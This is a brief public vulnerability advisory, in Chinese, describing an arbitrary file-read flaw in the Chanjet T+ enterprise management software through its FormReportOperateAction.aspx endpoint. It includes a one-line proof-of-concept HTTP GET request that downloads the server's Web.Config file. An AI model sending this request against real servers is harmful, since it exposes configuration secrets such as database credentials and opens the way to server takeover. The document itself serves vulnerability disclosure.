畅捷通T+ /tplus/FormReport/FormReportOperateAction.aspx 文件读取漏洞

2026-02-28 畅捷通T+ PoC Public

Description

畅捷通T+是用友畅捷通公司推出的一款面向中小企业的企业管理软件。其/tplus/FormReport/FormReportOperateAction.aspx接口存在文件读取漏洞。攻击者可通过preload、__Action、filepath参数读取服务器上的任意文件,包括配置文件、源代码等敏感信息,可能导致数据库凭证泄露、服务器权限被完全控制。

PoC

GET /tplus/FormReport/FormReportOperateAction.aspx?preload=1&__Action=DownLoadFile&filepath=/Web.Config HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities